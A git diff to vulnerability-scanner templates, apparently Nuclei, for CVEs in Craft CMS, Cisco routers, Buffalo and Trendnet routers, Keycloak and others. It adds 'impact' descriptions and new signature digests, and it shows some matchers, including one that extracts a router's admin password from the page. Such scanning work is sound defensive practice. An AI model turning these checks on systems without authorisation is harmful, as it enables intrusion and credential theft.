+# digest: 4b0a00483046022100cf87403489d89693fa1f8ab15a2bd11ff388040fdbe008907168879db0a14930022100addec9d345716fd830b2ffc0dd249adfa37b46f0d66af51244abedfb95faf899:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml
index 7c9160c070..fe6dc0c2ed 100644
--- a/http/cves/2020/CVE-2020-9757.yaml
+++ b/http/cves/2020/CVE-2020-9757.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the server.
   remediation: |
     Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b90c0190eeccaddb39291d2e8b94479e05e65b4a61c100290eb0c59fc503e5df02210086f3cbc1554a48daadd83b9e0cb16865236f7b11c971d91b89b6b14c558cf09b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100efd442eebe900a1451e1d643f2aaac8c57b18bf4eb35653f521e5b5b742beb370221008ea663490e2a28861eeff1955bc50ed02c30c01a7cf6295bad80aaf63ef97cfb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml
index 9b6e9a90a0..da2541f3d6 100644
--- a/http/cves/2021/CVE-2021-1472.yaml
+++ b/http/cves/2021/CVE-2021-1472.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device.
   remediation: |
     Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.
   reference:
@@ -77,4 +79,4 @@ http:
         part: body
         words:
           - '"jsonrpc":'
-# digest: 4a0a0047304502207a2d1957767aca7550b110f7b24e62ddb02bd26b193114d2e73f31f724f9d27902210088ff78068a6c18f81f52cf676cf9e2205825c22a215d870b323fb6e56e67c1b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204c1209dd00003b87a485d7361a5f352789d6e78aa7e9c6910a3efe362f479a16022046a3eb2a63639cf50609915144733ce62ce5351d04afd67cdc725dd7a1841776:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml
index 27375a36fd..7155ec2077 100644
--- a/http/cves/2021/CVE-2021-1498.yaml
+++ b/http/cves/2021/CVE-2021-1498.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220684b4b2c2e4104b4869e5942ed7ddeb2243ac4ce334f8de2420f6cee98ca38cd022051b52e4b84f8869ef07555a523699e8864ab7866ce5ff0f23051cf624747aee3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202286e2a00a581f5a1438123b88800798eb76e6599b5e5b32b1270472b7e332fb022100ad21766573f414e5484e50a0a0db28489d934c752c8c32d57bea60e7a45dd8ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml
index 42ba53b5a5..bc796e8fc2 100644
--- a/http/cves/2021/CVE-2021-1499.yaml
+++ b/http/cves/2021/CVE-2021-1499.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
+  impact: |
+    Allows an attacker to upload and execute arbitrary files on the target system
   remediation: |
     Apply the necessary security patches or updates provided by Cisco
   reference:
@@ -62,4 +64,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204779b8d3d0fbf12bc041d8f1fe573d8171945d3bb1eca81337ca66fe2caa56ae022100dfbb9af8e9d77e6937b1cf7e9acc47c248923fca2b02990a9f40301495dc5eea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fa36a9d178b9ebb108a9bbe6d1d8d8ce53ca52f5e4550afadf4d55892da9d871022100e3940cb129221d201488409c510c49cac7b0ad931346b0307e860f77bba8364a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml
index bfa99846b4..1e1f58d50c 100644
--- a/http/cves/2021/CVE-2021-20038.yaml
+++ b/http/cves/2021/CVE-2021-20038.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0, jbaines-r7
   severity: critical
   description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or crash the affected system.
   remediation: |
     Apply the latest security patch or update provided by SonicWall to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: {{useragent}}"
-# digest: 4b0a00483046022100d8baf22917d074fc80a84f7c125cf3378d1608eaeb3cc047587988698d14f46c0221009260b5b5c42fd9e4ac11ad015b3614f64a6ed8502c4135415f2b1789ffa0f0e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ef09752a7fea44891059ad7edb6fe29438c69a00f7243f04fbbd58e0047cb37a022100fe55bd107139575470ed2f5472ea7bf21b190d1444fc41cf98bb159d5c159dbb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml
index 9bf59d5daf..d4a87bcb83 100644
--- a/http/cves/2021/CVE-2021-20090.yaml
+++ b/http/cves/2021/CVE-2021-20090.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, such as configuration files, credentials, or other sensitive information.
   remediation: |
     Apply the latest firmware update provided by Buffalo to fix the path traversal vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f5c3d4d9b8888aa8bebf7028ca6c234e60cc80d7a7bf4f374f269bd85ce54d1e022100b8d89e0f83892f249a72c0c76d423696ceff6ef2b72ee46537f08e3e36e2d3c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ce2a7b9694534f2c910adb3bef5e4ca6b1aed2b7b8c0df8f6acc395ef45b7eb2022100e74a6297f6b33487a2eac8756a586d7d6b9c226da6315972ee6fd411673acd95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml
index 2f54d708c4..c6a1707098 100644
--- a/http/cves/2021/CVE-2021-20091.yaml
+++ b/http/cves/2021/CVE-2021-20091.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.
+  impact: |
+    An attacker can exploit this vulnerability to inject malicious configuration settings, potentially leading to unauthorized access or control of the router.
   remediation: |
     Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
         regex:
           - 'base64\,(.*?)" border='
         internal: true
-# digest: 4b0a00483046022100de1294d4372af4db6d129179c0dd86ef473965c267707f3f711677f7ef8b70d7022100b23dd4aeb1072c6051d28fed1b7293ee9ed6f6c68264f0e823bc6ad9054731fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201a897ec53dfaf82cd49130b3de355c260fe95d3410bc2df490b391854f13939b022100ce871a77330df4e547aa115bbffc47c0cf80e249b7059a506023555e8f455d8a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml
index 67781685cd..2e12931a51 100644
--- a/http/cves/2021/CVE-2021-20092.yaml
+++ b/http/cves/2021/CVE-2021-20092.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the router's configuration settings and potentially compromise the entire network.
   remediation: |
     Apply the latest firmware update provided by Buffalo to fix the access control issue.
   reference:
@@ -63,4 +65,4 @@ http:
         regex:
           - 'base64\,(.*?)" border='
         internal: true
-# digest: 4a0a00473045022100ea1e4c7a0280cd9583924c40d0a44ed1f5e27c87799524a43960cca6e9e5679c022076287dfd5c40e17f9757ea22426d5f9489df44d2a6c7cc9f2795be37a9cb803e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201919bd87ec111cdb62b74567c031fcc934754ada36ffea2e0e7e957e56aa94550221008c7db22739fbda71fd90ae80c1cc78f377c280692fd9f1c325a446416dcfe9e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml
index a3bfb9dfa3..d93eba5763 100644
--- a/http/cves/2021/CVE-2021-20114.yaml
+++ b/http/cves/2021/CVE-2021-20114.yaml
@@ -5,6 +5,8 @@ info:
   author: push4d
   severity: high
   description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.
+  impact: |
+    An attacker can gain access to sensitive information, potentially leading to unauthorized access or data leakage.
   remediation: |
     Upgrade TCExam to a version higher than 14.8.1 to mitigate the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210086c1a35ed2749a34435d67d06ba54bc6278172b9618d31a609265a1a68793b67022100a8e02b23f9441858c1b0d86253d8cc17a61de5d75727ace70bfb97777101d2a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100eb51dd765889ffe45d3588c5bf557b930f38cd2319acb8468bb9e012368bb4cb0220518660e5d36b37fac00564252f17b62473b94037d1e017fc66b2e94a591a9842:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml
index f7cc7d30df..6e126c54e2 100644
--- a/http/cves/2021/CVE-2021-20123.yaml
+++ b/http/cves/2021/CVE-2021-20123.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Draytek VigorConnect 1.6.0-B.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205260c16bc2355b463790d8137eb0c428a41d0028d10fd49ced1aba399086493a0220376e06efc6f40e6e2ab6a9a74fd8aafebd11916fa258ffece28c4487044e8a35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022010c00ee3ef4186a1929d91893f64d8a11f68bea09556f52420180dd676bdf65f022100bb708459b7a014b194de96be7d3b166f2f1b07027b3f8924449bfefec50129ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml
index 39d1310513..57a26a8bf1 100644
--- a/http/cves/2021/CVE-2021-20124.yaml
+++ b/http/cves/2021/CVE-2021-20124.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Draytek to fix the LFI vulnerability in VigorConnect 6.0-B3.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100913dc01394e6b4a58c436cba75b44cf89c9efdaec28cad1b59837f2c39f8c57002206c8be2ab8cc9c8687c348cb26272e6a493450a099d1585a0da2c90251cdb5292:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201de92a38e3166caae0d57c70c36a0e995b0635aac5785196c79dc15cdd0fb59d022100a91fa3826934033aba611d77ed0b8371cfa71af5f1e77b08f6575296fe51b51b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml
index 3a9f614365..b6e4cc8a29 100644
--- a/http/cves/2021/CVE-2021-20137.yaml
+++ b/http/cves/2021/CVE-2021-20137.yaml
@@ -5,6 +5,8 @@ info:
   author: edoardottt
   severity: medium
   description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f04132746239060ce3e32f20df5874add39236c393c28e5fae266fddae0ea0b50220575a4c7d5c054c272500818993ffa80555d0ef3e55b708c5a688ce50b124b743:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203250bfc024e87d78cb8ae391742b7ea67d0b4a95194d524cd1a6312c94b970ec022100dbee3abfee4ead1f090521ec21d421eba16b7d479780d4c883a636be260461cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml
index c10633b99b..66617f48cf 100644
--- a/http/cves/2021/CVE-2021-20150.yaml
+++ b/http/cves/2021/CVE-2021-20150.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
+  impact: |
+    An attacker can obtain sensitive credentials, leading to unauthorized access to the router.
   remediation: |
     Update the router firmware to the latest version to fix the vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
         regex:
           - '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
         part: body
-# digest: 4a0a00473045022100ddc8246d7a731a74f3a27bdb43431d0e57bc8262b7a963240df5f6b60723effb02207aa17c23def93f221232aa4bbe2de9c6e33f1909efd8f451ddee407dbb79ac9d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202c4bceeb538759eb513042bf8af81b6b9ed5814af2b1a637b2eb929d6e0917ca022035ac6ec78e9676c8e499d7b64137803c4732a5ee6585ad56e20ea848d2b4c988:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml
index 47f56a2acb..fb3586a07f 100644
--- a/http/cves/2021/CVE-2021-20158.yaml
+++ b/http/cves/2021/CVE-2021-20158.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
+  impact: |
+    An attacker with authenticated access can gain unauthorized control over the affected device.
   remediation: |
     Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205ccea42cc968672028e84db4f62778ba3f2c9a3042fcdb00ed933bd5d1af293902210099e06a07576c57b114b7b1df92f8378bf4091be29814ff0c026ee2ff8fac98a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e408a9330faedc1034b7b9e814035d542d765e198d15c9c24b043d7da38c38c1022100c1469505cdfba39819a2c44f4cbdb5bb992875e79b855ad3d5c8e2e55638106d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml
index 22df417a43..43779fe70f 100644
--- a/http/cves/2021/CVE-2021-20323.yaml
+++ b/http/cves/2021/CVE-2021-20323.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Keycloak to a version that is not affected by the vulnerability (10.0.1 or higher).
   reference:
@@ -60,4 +62,4 @@ http:
       - type: status
         status:
           - 400
-# digest: 4a0a0047304502200d378f4ea27da6b5c0896090f09474119d4b92fef3fd9784d21e5ab7cd50b675022100b82cc2712e87618d65181582edf2144c87db948893228f5836ed41b2bc43c8c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022023c5349f08b56d8cfa041f3221b8d21d58d11aba21945d48b812cd4b439f4263022018f841f33624bee78cf952a37b0dc536e07bd54d679c22247e3f660bf6c0a0bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml
index df4b938ec0..b379aa7995 100644
--- a/http/cves/2021/CVE-2021-20792.yaml
+++ b/http/cves/2021/CVE-2021-20792.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of WordPress Quiz and Survey Master plugin (7.1.14) to mitigate the vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d9fedb431979eafc59ccf019261c3300c5059f19a499067f81f1ea5e0ed8db0902206c81cd22d00e6a95c357481e9f7350502159d3001fa243b5cddc35d7008e85db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b719a637ff390d2d84d19cf16c6cf74c685526e7743942b126ec241d2c0e323f022075ad413e151c569d64ff40d75ac6db951e4a523d123f81326f27bebabeac8d07:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml
index cd97f45cab..7d0c8754f5 100644
--- a/http/cves/2021/CVE-2021-20837.yaml
+++ b/http/cves/2021/CVE-2021-20837.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK,hackergautam
   severity: critical
   description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType.
   reference:
@@ -62,4 +64,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022075299d703d83ca56e39ddc963a63fae5c0b011869e884ec95aaf99313df628c4022067d7c40d46446e31e851f8ae8f5874e52d44496ae52a62c1af1c5e7b16ffbcd1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205357a37dffc64896c4442d3be756bcef5707769e53a48673bf117e600acc552d022100bc4b651dbee893063e05907a6d464fb9a530b138b863a7807d664a30ad3f8335:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml
index f4111b41a2..c17221fa6d 100644
--- a/http/cves/2021/CVE-2021-21087.yaml
+++ b/http/cves/2021/CVE-2021-21087.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Adobe to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c007d02af624e41651ac3370534235f0d9089a4f0de934263d598236e0ef6117022065ccab16271ac7dda1f8c170f92f485480c4992c322fb6ec962d191097ca3902:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ccbb75cf5851b592b1e92ec041cb9669ba9a9699ddb8db1d02f4f1622a8350e9022016e1ea2060f03b26dab1ecadd4e4d52d1a9ddce146e939207bc2f0c61f5d57b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml
index 800e7a2f9d..c4bb6ab017 100644
--- a/http/cves/2021/CVE-2021-21234.yaml
+++ b/http/cves/2021/CVE-2021-21234.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview".
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Spring Boot Actuator.
   reference:
@@ -56,4 +58,4 @@ http:
           - "contains(body, 'extensions')"
           - "status_code == 200"
         condition: and
-# digest: 4b0a00483046022100f732a5eb9874cb7c63e8f2af5344c67e1049fd3f9868ec21cf8cbc3213ce7824022100f6128be724fdcbe92ea68a6f646e2e7ce75a8a25d393098c7943818265b43075:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100808ed6a011bb73d76681dc1cd3e8694ac9c38ed6651e90fd536e57d084f3585002203e53ccb02be1a12355d07f883c52f5d3e7117d890cc856a7d24400fe28f80ecc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml
index dd06d94a0e..b0f8259412 100644
--- a/http/cves/2021/CVE-2021-21287.yaml
+++ b/http/cves/2021/CVE-2021-21287.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage.
   remediation: |
     Apply the latest security patches or updates provided by MinIO to fix this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: word
         words:
           - "We encountered an internal error"
-# digest: 490a0046304402205f9511a370fc70499da6e63ad9fa219a6ef37523d4e6d3a26fd9e96f64d7e39d022060bb3d7a3d7d64803ac247d8b64c405ce1b6fa8d448a81148c8e4ebd786c2651:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100aacedccebf84b83910775273c69f1b3c33cd2056144e07f5ddc4ab3f066b68490220635f854d1ce9e36fef2fb7361a9552a65b3f873ad81777a7156c51b8dfb2b0a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml
index 55e6155883..9f6b181e12 100644
--- a/http/cves/2021/CVE-2021-21307.yaml
+++ b/http/cves/2021/CVE-2021-21307.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: critical
   description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.
   reference:
     - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
@@ -89,4 +91,4 @@ http:
       - type: regex
         regex:
           - "(u|g)id=.*"
-# digest: 4b0a00483046022100f53fad884997e9addb662683dfaa3f25ab1c3761f8620ff115b9c9a52cba1e2b022100d9d81b1c19e25780dfa31d925f4f8766304bcc3695ba1b8729b90677d84db4ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220621416ee5c73a5ed0e087a48869eee7e5234be26ae6c42b3de94c411f375b7cc022009d0db4789b3010717267b88366f6578071090fd8f1558c8dea912afc5a0dd40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml
index ba45ee49ef..ec8587d996 100644
--- a/http/cves/2021/CVE-2021-21311.yaml
+++ b/http/cves/2021/CVE-2021-21311.yaml
@@ -5,6 +5,8 @@ info:
   author: Adam Crosser,pwnhxl
   severity: high
   description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage.
   remediation: Upgrade to version 4.7.9 or later.
   reference:
     - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
@@ -64,4 +66,4 @@ http:
       - type: status
         status:
           - 403
-# digest: 4b0a00483046022100d4a15e99b2c9b3a8c8ad298dfd0d48be11e9fb516806bc6ce04db19604010062022100c7666210b560d86ddb3ec9dbcdb4875b333404c2d78419f8c180436979fe4cac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220146bdb67659030faefb297d09c2b84c24e699232ce998d35c214abbf77854ad802200a7563aa77ab87219a047f09bc35ce7274e288e752a23ab126c1a6079d9814f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml
index 4f17fd2394..4ca3106a2c 100644
--- a/http/cves/2021/CVE-2021-21315.yaml
+++ b/http/cves/2021/CVE-2021-21315.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
